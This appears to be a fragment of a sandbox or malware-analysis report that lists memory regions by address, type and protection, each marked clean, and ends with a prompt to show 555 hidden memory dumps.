28A0000
unkown
page read and write
clean
1DB5000
heap private
page read and write
clean
3AA3000
unkown
page read and write
clean
32CA000
unkown
page read and write
clean
3294000
unkown
page read and write
clean
3715000
heap private
page read and write
clean
3059000
unkown
page read and write
clean
2375000
unkown
page read and write
clean
2B50000
heap private
page read and write
clean
2D91000
unkown
page read and write
clean
28B0000
unkown
page read and write
clean
313A000
unkown
page read and write
clean
36B9000
unkown
page read and write
clean
30F9000
unkown
page read and write
clean
30AA000
unkown
page read and write
clean
222C000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
28A0000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
There are 555 hidden memdumps, click here to show them.